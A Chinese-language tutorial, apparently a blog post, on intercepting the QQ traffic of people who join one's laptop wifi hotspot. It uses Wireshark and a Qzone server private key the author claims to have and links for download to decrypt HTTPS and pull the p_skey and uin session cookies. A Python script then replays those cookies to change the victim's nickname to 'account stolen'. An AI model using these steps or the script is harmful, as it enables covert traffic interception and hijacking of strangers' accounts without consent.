盗取连接你wifi的人的qq

#本文内容仅供个人娱乐学习

思路：

使用wireshark监听笔记本的wifi热点，拦截捕获连接你的wifi热点的人的手机qq网络数据包，从网络数据包中分析取出两个qq空间的两个coookie值，使用cookie值修改掉连接你的wifi的人的qq昵称，从而制造账号被盗的假象。

实现：

所需工具：wireshark数据包分析系统，能启用wifi热点的笔记本，一门可以输出http请求的编程语言。

一、启用wifi热点

二、确定wifi热点的接口名称

三、打开wireshark监听这个网络接口

四、用手机连接这个wifi热点，然后打开手机qq浏览一下动态（qq空间）

五、解密wireshark捕获的数据包

未解密的数据流：

qq空间使用了https协议，wireshark无法自动解密https数据流，我们给wireshark提供一个qq空间的服务器证书私钥就可以解密qq空间的数据流了。

这里我已经拿到了qq空间的私钥，qzone.key下载地址：https://pan.baidu.com/s/1HeF9wLMOTVXA8kqWv6ZurQ

配置方法请见：http://www.cnblogs.com/aucy/p/9082429.html

解密后的数据流：

六、解密后在wireshark输入筛选规则“http.cookie”，找到“p_skey”与对应的“uin”这俩cookie值

七、修改目标qq昵称

数据包配置：

url：https://mobile.qzone.qq.com/profile_mod

cookie：p_uin=<uin值> p_skey=<p_skey值>

data：format=json&nickname=<想要改的昵称>&birthyear=2018&birthmonth=1&birthday=1

我这里使用python发送数据包：

from urllib import request

def HTTP_POST(url,data,headers):
    req=request.Request(url,bytes(data,"utf-8"),headers)
    res=request.urlopen(req)
    print(res.read())

def ModNick(nick,cookies):
    url="https://mobile.qzone.qq.com/profile_mod"
    data="format=json&nickname="+nick+"&birthyear=2018&birthmonth=1&birthday=1"
    headers={
        "cookie":cookies
    }
    HTTP_POST(url,data,headers)

if __name__ == '__main__':
    ModNick("账号已被盗","p_uin=o2221234077; p_skey=W7IF8j7lBIh3UeRdQq1wKS9ToHAKuJnKsjXgzOQmK5w_;")